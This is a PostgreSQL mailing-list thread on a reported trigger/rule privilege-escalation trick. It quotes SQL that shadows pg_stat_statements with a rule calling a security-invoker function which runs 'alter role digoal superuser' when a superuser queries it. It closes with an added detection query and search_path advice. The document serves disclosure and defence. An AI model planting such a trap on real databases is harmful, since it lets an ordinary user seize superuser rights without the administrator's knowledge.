Re: BUG #13651: trigger security invoker attack
From | David G. Johnston |
---|---|
Subject | Re: BUG #13651: trigger security invoker attack |
Date | |
Msg-id | CAKFQuwYVUfXBbmb+hmbY-SVS8D0DemfP2-c+gp-wAnyZy8zNUQ@mail.gmail.com |
In reply to | BUG #13651: trigger security invoker attack (digoal@126.com) |
Responses | Re: BUG #13651: trigger security invoker attack |
List | pgsql-bugs |
And what would be an acceptable solution/behavior in your eyes?

On Tuesday, September 29, 2015, 德哥 <digoal@126.com> wrote:

> The point is:
> A superuser can be tricked, like with phishing sites.
> For example:
> A DBA, or some monitoring/admin software, queries these tables or views.
>
> --
> Public welfare is a lifelong cause. I'm Digoal, Just Do It.
>
> On 2015-09-30 10:01:12, "David G. Johnston" <david.g.johnston@gmail.com> wrote:
>
> On Tuesday, September 29, 2015, 德哥 <digoal@126.com> wrote:
>
>> A normal user gets superuser privileges using a security invoker function.
>>
>> postgres=> create table pg_stat_statements (
>>   userid oid ,
>>   dbid oid ,
>>   queryid bigint ,
>>   query text ,
>>   calls bigint ,
>>   total_time double precision ,
>>   rows bigint ,
>>   shared_blks_hit bigint ,
>>   shared_blks_read bigint ,
>>   shared_blks_dirtied bigint ,
>>   shared_blks_written bigint ,
>>   local_blks_hit bigint ,
>>   local_blks_read bigint ,
>>   local_blks_dirtied bigint ,
>>   local_blks_written bigint ,
>>   temp_blks_read bigint ,
>>   temp_blks_written bigint ,
>>   blk_read_time double precision ,
>>   blk_write_time double precision );
>>
>> postgres=> create or replace function f() returns pg_stat_statements as
>> $$
>> declare
>> begin
>>   alter role digoal superuser;
>> end;
>> $$ language plpgsql security invoker;
>> CREATE FUNCTION
>>
>> postgres=> create rule "_RETURN" as on select to pg_stat_statements do
>> instead select * from f();
>> CREATE RULE
>>
>> When a superuser selects from the view pg_stat_statements, the normal user
>> digoal will be granted the superuser role.
>>
>> Yes, it's a normal operation, but somebody can use this trick.
>>
>
> Everything you just wrote was done as superuser, so what's your point?
>
> David J.
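The risk discussed in the thread is a look-alike relation (here a table named `pg_stat_statements` with a `_RETURN` rule, which is what makes it behave as a view) that an unqualified name resolves to before the real object, so that a superuser's routine query runs the rule's function with superuser rights. The query below is an added example written for this page, not code from the thread or from PostgreSQL itself; it uses only standard catalog tables and functions (`pg_class`, `pg_namespace`, `pg_rewrite`, `pg_table_is_visible`, `pg_get_ruledef`, `pg_get_userbyid`). Run as the DBA, it lists every relation name that exists in more than one schema, flags which copy the current `search_path` would hit, and shows the owner and any rewrite rule attached, so shadowing objects can be reviewed before any superuser session queries them by bare name.

```sql
-- Added example (not from the thread): find relation names present in
-- more than one schema, which copy an unqualified reference resolves to
-- under the current search_path, who owns it, and any rewrite rules
-- (a "_RETURN" rule on a table is the trick shown in the report).
WITH dup AS (
    SELECT relname
    FROM pg_class
    WHERE relkind IN ('r', 'v', 'm')       -- tables, views, matviews
    GROUP BY relname
    HAVING count(*) > 1
)
SELECT n.nspname                   AS schema,
       c.relname                   AS name,
       c.relkind,
       pg_get_userbyid(c.relowner) AS owner,
       -- true for the copy that an unqualified name hits in this session
       pg_table_is_visible(c.oid)  AS resolves_first,
       r.rulename,
       pg_get_ruledef(r.oid)       AS rule_definition
FROM pg_class c
JOIN dup USING (relname)
JOIN pg_namespace n ON n.oid = c.relnamespace
LEFT JOIN pg_rewrite r ON r.ev_class = c.oid
ORDER BY c.relname, resolves_first DESC, n.nspname;
```

Any row where `resolves_first` is true, the owner is not a trusted role, and a rule definition calls a function is worth inspecting. The corresponding mitigation, which the thread's "everything was done as superuser" exchange points at, is procedural: superuser sessions and monitoring jobs should schema-qualify the objects they read (for example `public.pg_stat_statements`, or whichever schema the extension was installed in) or set a `search_path` that excludes user-writable schemas, so that a user-created look-alike cannot be selected by accident.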